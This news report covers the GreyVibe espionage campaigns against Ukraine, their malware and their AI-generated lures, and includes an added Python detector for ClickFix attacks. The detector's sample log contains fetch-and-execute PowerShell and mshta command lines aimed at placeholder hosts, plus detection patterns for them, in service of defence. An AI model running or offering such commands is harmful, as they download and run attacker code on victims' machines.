GreyVibe Hackers Leverage AI Tools for Cyberespionage Campaigns Targeting Ukraine
A threat group dubbed **GreyVibe**, suspected to be of Russian origin, has been employing AI-generated lures and custom malware in sophisticated cyberespionage campaigns. The group is primarily targeting entities in the military, government, civilian, and business sectors, with a focus on Ukrainian or Ukraine-related organizations.

**GreyVibe** has been active since at least August 2023, using a diverse set of custom malware tools and sophisticated social engineering tactics. While researchers at **WithSecure** cannot definitively classify the group as a nation-state operation, the activity aligns with Russian state interests.
**Campaign Overview**
**WithSecure** discovered the activity in January 2024, revealing a focus on Ukrainian organizations. Indicators such as malware panel language, code comments, and command-and-control (C2) server time configured to UTC+3 (Moscow time) support the link to a Russian-speaking threat actor.
GreyVibe employs several attack chains, including:
* **PhantomMail**: Spear-phishing emails delivering malicious ZIP/RAR archives via **Google Drive** and 4sync links, impersonating Ukrainian government, emergency, telecom, and energy entities. The archives show the victim a decoy PDF or a fake error message while the malware installs in the background.
* **PhantomClick**: Fake CAPTCHA/ClickFix pages disguised as **Zoom** and LAPAS sites, which present a fake **Cloudflare** verification prompt and trick victims into running commands that infect their own machines.
* **PrincessClub**: Fake Ukrainian adult/dating websites delivering **FallSpy** Android spyware and **PhantomRelay**/**LegionRelay** Windows malware. The operators use fake female **Telegram** personas and WebRTC-based live calls to capture the victim's audio/video.
* **DroneLink**: Fake Ukrainian military charity websites themed around FPV drones and UAVs, sharing infrastructure and tooling with PrincessClub campaigns.
* **Nebo**: Fake Russian-language military communications login pages, likely designed to trick Ukrainian military personnel into believing they were accessing a Russian military terminal.
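The PhantomClick chain above is a ClickFix variant: the victim is told to run a command, so the resulting process tree is an interactive shell parent (explorer.exe for the Win+R Run dialog) spawning a script interpreter whose command line fetches and executes remote content. The detector below is an added example, not WithSecure's or GreyVibe's code, and every log line in it is constructed; the space-separated key=value format stands in for Sysmon Event ID 1 data, and the command lines, hostnames and cue list are illustrative assumptions, not indicators from the campaign.

```python
"""Flag ClickFix-style process chains in process-creation log lines.

Added example, not from the original article. Log format and sample lines
are constructed to mimic Sysmon Event ID 1 fields; real data would come
from EVTX/XML or a SIEM export. Quoted values must not contain inner
double quotes (the sample lines use single quotes inside commands).
"""
import re

# explorer.exe is the parent when a user pastes into the Run dialog (Win+R);
# a terminal host is the parent when the lure says "open a terminal".
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line cues typical of paste-and-run payloads (assumed list):
# remote fetch, hidden window, encoded command, execution-policy bypass.
SUSPICIOUS_CUES = [
    re.compile(r"https?://", re.I),
    re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|certutil)\b", re.I),
    re.compile(r"-(w|win|windowstyle)\s+hidden", re.I),
    re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    re.compile(r"\bmshta\b.*https?://", re.I),
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> dict:
    """Parse 'Key=Value Key="quoted value"' into a dict of strings."""
    return {key: (quoted or bare) for key, quoted, bare in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> list[str]:
    """Return the cue patterns matched by one event (empty if not a candidate)."""
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    if parent not in INTERACTIVE_PARENTS or image not in INTERPRETERS:
        return []
    cmd = ev.get("CommandLine", "")
    return [pat.pattern for pat in SUSPICIOUS_CUES if pat.search(cmd)]


def detect_clickfix(lines, min_cues: int = 2) -> list[dict]:
    """Return flagged events; min_cues is a tuning assumption to limit noise
    from an administrator launching a local script from the Run dialog."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev.get("EventID") != "1":          # only process-creation events
            continue
        cues = score_event(ev)
        if len(cues) >= min_cues:
            hits.append({"pid": ev.get("ProcessId"), "user": ev.get("User"),
                         "cmd": ev.get("CommandLine", ""), "cues": cues})
    return hits


# Constructed sample log (hostnames use the reserved .invalid TLD).
SAMPLE_LOG = [
    # 1: victim pastes the lure's command into Win+R -> flagged
    r'EventID=1 ProcessId=4812 User="CORP\jdoe" ParentImage="C:\Windows\explorer.exe" '
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell -w hidden -ep bypass -c iex (irm https://verify.example.invalid/check)"',
    # 2: mshta pulling a remote HTA from the Run dialog -> flagged
    r'EventID=1 ProcessId=5120 User="CORP\asmith" ParentImage="C:\Windows\explorer.exe" '
    r'Image="C:\Windows\System32\mshta.exe" CommandLine="mshta https://update.example.invalid/x.hta"',
    # 3: admin running a local script from Win+R -> no cues, not flagged
    r'EventID=1 ProcessId=6001 User="CORP\admin" ParentImage="C:\Windows\explorer.exe" '
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell -File C:\scripts\backup.ps1"',
    # 4: scheduled updater spawned by a service, not an interactive parent -> not a candidate
    r'EventID=1 ProcessId=7044 User="NT AUTHORITY\SYSTEM" ParentImage="C:\Windows\System32\svchost.exe" '
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell -c iwr https://updates.example.invalid/pkg.zip -OutFile pkg.zip"',
    # 5: network-connection event, wrong EventID -> skipped
    r'EventID=3 ProcessId=4812 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'DestinationIp=203.0.113.7 DestinationPort=443',
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_LOG):
        print(hit["pid"], hit["user"], hit["cues"], hit["cmd"])
```

Line 4 in the sample shows the detector's blind spot by design: the parent-process filter keeps a service-launched download out of the alert, so a ClickFix payload that re-launches itself from a scheduled task would need a second rule keyed on the command line alone. The cue threshold, the parent list and the cue regexes are all assumptions to tune against your own telemetry.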
**AI-Powered Lures and Tool Development**
The quality and diversity of these lures are attributed to the use of AI tools, including **ChatGPT**, **Ideogram AI**, and **Google Gemini**, to generate detailed and realistic content.
<div>
<figure><img width="800" src="https://www.bleepstatic.com/images/news/u/1100723/GreyVibe_LLM.webp" height="493" alt="LLM markers in images used by GreyVibe"><figcaption><strong>LLM markers in images used by GreyVibe</strong><br><em>source: WithSecure</em></figcaption></figure>
</div>
AI also appears to have assisted in building the group's tooling: **LOOKVALPS**, **LOOKVALJS**, **DAYLIGHT**, and **TEASOUP** are custom obfuscators likely developed with LLM help, and a PowerShell-based remote access trojan named **LegionRelay** was also likely developed with AI tools, according to the researchers.
LegionRelay supports file theft, screenshot capturing, browser credential theft, **Telegram** and **WhatsApp** data exfiltration, and RDP access setup.
Another malware used by GreyVibe is **PhantomRelay**, also a PowerShell RAT. The malware supports system fingerprinting, dynamic script loading, and PowerShell and Windows command execution.
<div>
<figure><img width="900" src="https://www.bleepstatic.com/images/news/u/1220909/2026/May/overview(1).jpg" height="231" alt="Overview of malware and campaign associations"><figcaption><strong>Overview of malware and campaign associations</strong><br><em>Source: WithSecure</em></figcaption></figure>
</div>
The **FallSpy** Android spyware, used in the PrincessClub and Nebo campaigns, is designed for intelligence gathering. It collects contact lists, call logs, device and network information, location data, media files, and SIM information.
**Cybercriminal Ties and Uncertainties**
**WithSecure** notes that while GreyVibe's activity resembles a nation-state operation, the threat actor lacks the sophistication and operational discipline typically associated with mature state-sponsored groups. The use of **PhantomRelay** in cybercrime activity further complicates the picture.
Early and test samples used a unique ISO builder associated with a group of former **TrickBot** members (UAC-0098) that targeted Ukraine at the start of the Russian invasion. Additionally, the threat actor uploaded development and test samples to public scanning platforms, an atypical behavior for nation-state actors. A cryptocurrency miner was also deployed on some victim machines.
Researchers remain uncertain whether former or current cybercriminal members have been absorbed into a state-backed group, operate independently with state-directed tasking, or have formed a hybrid team.
Defenders can hunt for GreyVibe activity using the [indicators of compromise](http://github.com/WithSecureLabs/iocs/blob/master/GREYVIBE/greyvibe_iocs.csv) (IoCs) published by **WithSecure**.